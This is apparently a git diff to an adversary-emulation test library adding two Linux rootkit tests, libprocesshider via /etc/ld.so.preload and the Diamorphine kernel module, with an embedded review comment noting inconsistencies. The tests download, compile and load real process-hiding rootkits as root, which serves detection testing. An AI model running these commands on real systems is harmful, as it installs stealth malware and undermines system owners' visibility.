diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7531aedb..7aaf6560 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -28,6 +28,8 @@ defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a0170a84..a2b5299d 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -14,6 +14,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 82abbff6..1f4ad974 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -43,6 +43,8 @@
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+ - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+ - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 4e1e11eb..578a51fb 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -22,6 +22,8 @@
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+ - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+ - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 13a32253..375ad111 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1712,6 +1712,104 @@ defense-evasion:
sudo depmod -a
name: sh
elevation_required: true
+ - name: dynamic-linker based rootkit (libprocesshider)
+ auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+ description: 'Uses libprocesshider to simulate rootkit behavior by hiding a
+ specific process name via ls.so.preload (see also T1574.006).
+
+ '
+ supported_platforms:
+ - linux
+ input_arguments:
+ repo:
+ description: Url of the github repo zip
+ type: String
+ default: https://github.com/gianlucaborello/libprocesshider/
+ rev:
+ description: Revision of the github repo zip
+ type: String
+ default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
+ library_path:
+ description: Full path of the library to add to ld.so.preload
+ type: String
+ default: "/usr/local/lib/libprocesshider.so"
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'The preload library must exist on disk at specified location
+ (#{library_path})
+
+ '
+ prereq_command: 'if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+
+ '
+ get_prereq_command: |
+ mkdir -p /tmp/atomic && cd /tmp/atomic
+ curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+ make
+ cp libprocesshider.so #{library_path}
+ cp /usr/bin/ping /usr/local/bin/evil_script.py
+ executor:
+ command: |
+ echo #{library_path} | tee -a /etc/ld.so.preload
+ /usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+ cleanup_command: |
+ sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+ rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+ name: sh
+ elevation_required: true
+ - name: Loadable Kernel Module based Rootkit (Diamorphine)
+ auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
+ description: 'Loads Diamorphine kernel module, which hides itself and a processes.
+
+ '
+ supported_platforms:
+ - linux
+ input_arguments:
+ repo:
+ description: Url of the diamorphine github repo
+ type: String
+ default: https://github.com/m0nad/Diamorphine/
+ rev:
+ description: Revision of the github repo zip
+ type: String
+ default: 898810523aa2033f582a4a5903ffe453334044f9
+ rootkit_path:
+ description: Path To rootkit
+ type: String
+ default: "/tmp/atomic/Diamorphine"
+ rootkit_name:
+ description: Module name
+ type: String
+ default: diamorphine
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+
+ '
+ prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
+ exit 0; else exit 1; fi;
+
+ '
+ get_prereq_command: |
+ mkdir -p /tmp/atomic && cd /tmp/atomic
+ curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+ make
+ sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+ sudo depmod -a
+ executor:
+ command: |
+ sudo modprobe #{rootkit_name}
+ ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ ps $TARGETPID
+ kill -31 $TARGETPID
+ ps $TARGETPID || echo "process ${TARGETPID} hidden"
+ cleanup_command: |
+ kill -63 1
+ sudo modprobe -r #{rootkit_name}
+ sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+ sudo depmod -a
+ name: sh
+ elevation_required: true
T1109:
technique:
x_mitre_platforms:
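Review bot: The Diamorphine dependency block is internally inconsistent: its `description` says the module must exist at `#{rootkit_path}/#{rootkit_name}.ko`, but `prereq_command` checks and `get_prereq_command` installs `/lib/modules/$(uname -r)/#{rootkit_name}.ko`, and the `rootkit_path` input argument is never used by any command, so either drop that argument or make the description and the check agree with where the module is actually placed. Two wording defects in the new descriptions: the libprocesshider text says `ls.so.preload` while the argument and the commands use `/etc/ld.so.preload` (suggest `via /etc/ld.so.preload (see also T1574.006)`), and the Diamorphine text reads `hides itself and a processes`, presumably `hides itself and processes`. In the libprocesshider executor `pgrep -l evil_script.py` runs immediately after backgrounding the copied binary, so pgrep can miss a process that has not started yet and print "process hidden" without the preload having done anything; a short pause before the check would make the output evidence of the hook rather than of a race. The cleanup's `sed -i` on `/etc/ld.so.preload` also leaves an empty `/etc/ld.so.preload` behind when that file did not exist before the test, which defenders who baseline that file may want stated in the description. index.yaml and the T1014.md hunks appear to be generated from the technique's own YAML (not in this diff), so the fixes belong there.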
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index 75bcea5a..f55e3b09 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
@@ -10,6 +10,10 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
+- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
+
+- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
+
@@ -129,4 +133,124 @@ sudo depmod -a
+
+
+
+## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
+Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006).
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the github repo zip | String | https://github.com/gianlucaborello/libprocesshider/|
+| rev | Revision of the github repo zip | String | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
+| library_path | Full path of the library to add to ld.so.preload | String | /usr/local/lib/libprocesshider.so|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+echo #{library_path} | tee -a /etc/ld.so.preload
+/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+```
+
+#### Cleanup Commands:
+```sh
+sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: The preload library must exist on disk at specified location (#{library_path})
+##### Check Prereq Commands:
+```bash
+if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+make
+cp libprocesshider.so #{library_path}
+cp /usr/bin/ping /usr/local/bin/evil_script.py
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
+Loads Diamorphine kernel module, which hides itself and a processes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the diamorphine github repo | String | https://github.com/m0nad/Diamorphine/|
+| rev | Revision of the github repo zip | String | 898810523aa2033f582a4a5903ffe453334044f9|
+| rootkit_path | Path To rootkit | String | /tmp/atomic/Diamorphine|
+| rootkit_name | Module name | String | diamorphine|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+sudo modprobe #{rootkit_name}
+ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ps $TARGETPID
+kill -31 $TARGETPID
+ps $TARGETPID || echo "process ${TARGETPID} hidden"
+```
+
+#### Cleanup Commands:
+```sh
+kill -63 1
+sudo modprobe -r #{rootkit_name}
+sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+sudo depmod -a
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+##### Check Prereq Commands:
+```bash
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+make
+sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+sudo depmod -a
+```
+
+
+
+